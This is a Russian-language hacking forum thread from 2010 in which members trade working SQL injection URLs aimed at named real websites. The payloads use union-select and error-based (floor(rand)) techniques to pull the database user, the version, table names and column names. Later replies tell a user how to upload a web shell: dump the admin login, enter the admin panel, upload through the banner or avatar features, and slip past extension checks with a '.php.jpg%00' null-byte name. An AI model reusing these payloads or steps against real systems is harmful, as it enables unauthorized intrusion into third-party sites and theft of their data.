Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php  on line 26
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near [B]'@localhost:valesby[/B]:5.0.90' at line 4
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
    The used SELECT statements have a different number of columns
    Здесь просто имя юзера после локалхост пишет.
     
  2. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Все, разобрался, это value в кавычках. Спасибо.
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Улыбнуло :D

    Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа.

    Делаем запрос:
    Code:
    http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),database(),version()))
    Получаем:
    Code:
    76616C65736279406C6F63616C686F73743A76616C657362793A352E302E3930
    Что в HEX:
    Code:
    valesby@localhost:valesby:5.0.90
    Тоесть
    Code:
    имя_юзера:БД:версия
    Проявляем смекалку и нестандартное мышление, товарищи... :)
     
    #11963 mailbrush, 24 Mar 2010
    Last edited: 24 Mar 2010
    3 people like this.
  4. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    там phpbb - форум :D
    прав не хватает... :( шелл не залить
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 mailbrush:
    Code:
    http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+user()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
    
     
    1 person likes this.
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а дальше как видеть колонки в таблице ua_menu_item1 ??

    зделаю так

    не получаеться..помоqите поjaлуста
     
  7. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Потому что ua_menu_item1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..

    Code:
    http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
     
    #11967 v1d0qz, 25 Mar 2010
    Last edited: 25 Mar 2010
  8. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://diktatu.net/index.php?id=34&i_id=1625
    Cкажите, это php-inj?
     
  9. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    нет..
    Code:
    http://diktatu.net/index.php?id=-1+union+select+1,2,%28select+concat%280x7e,0x27,group_concat%28table_name%29,0x27,0x7e%29+from+information_schema.tables+Where+table_schema=0x64696B74617430305F64696B74617475%29--
     
  10. general.fox

    general.fox Member

    Joined:
    9 Nov 2009
    Messages:
    83
    Likes Received:
    8
    Reputations:
    -1
    На UcoZе есть XSS?
     
  11. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    не получилось
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.zed.ua/en/index.php?id=(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x75615f6d656e755f6974656d+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2+limit+0,1)a)
    
     
    #11972 Pashkela, 25 Mar 2010
    Last edited: 25 Mar 2010
    1 person likes this.
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    @localhost:valesby@localhost:valesby:5.0.90
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Ctacok:

    Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))
     
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Хоть ты мне и писал как-то давно что не обязательно, но уж от привычки сложно отказаться, да и рука сама тянеться, и не всегда кстате срабатывает без +--+, ну ты понел.
     
    2 people like this.
  16. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Знаю уже задолбал своими вопросами, но кому не трудно ответьте.
    Вопрос состоит в том, как залить шелл?
    Вот есть у меня скуля:
    .
    Напишите как можно залить сюда шелл.
    И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.?
    Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается :(
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    покажи как делал.

    достаешь из базы пасс и логин от админки - заходишь и там смотришь по обстоятельствам.
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    CyberHunter, шелл ты сможешь залить через админку, фтп или исполнить инклуд. Думаю, что в твоем случае нужно раскрутить твою скулю до вида логин;пароль.
    После того, как зайдешь в админку, шелл сможешь залить, анпример, через систему баннеров, аватаров и т.д. Если сервер не захочет исполнять пхп файл, сделай расширение, например .php.jpg%00 (с нулевым байтом)
     
  19. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    что за чудо-конструкция? :)
     
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    это защита от дурака. Специально так.
     
    1 person likes this.
Thread Status:
Not open for further replies.